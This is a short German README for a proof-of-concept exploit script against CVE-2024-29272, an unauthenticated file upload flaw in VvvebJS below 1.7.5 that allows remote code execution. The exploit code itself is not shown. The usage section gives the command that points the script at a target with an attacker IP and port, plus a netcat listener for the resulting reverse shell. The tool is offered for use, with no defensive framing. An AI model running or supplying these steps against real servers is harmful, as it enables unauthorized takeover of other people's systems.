
Proof-of-Concept-Exploit für CVE-2024-29272, eine nicht authentifizierte Schwachstelle für beliebige Datei-Uploads in VvvebJS < 1.7.5, die Remote-Codeausführung ermöglicht.
Dies ist ein Proof-of-Concept für CVE-2024-29272, eine nicht authentifizierte Schwachstelle für willkürlichen Datei-Upload, die zu Remote-Code-Ausführung auf Versionen von VvvebJS < 1.7.5 führt.
Verwendung:
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
in einem anderen Terminal:
nc -lvnp <ATTACKER PORT>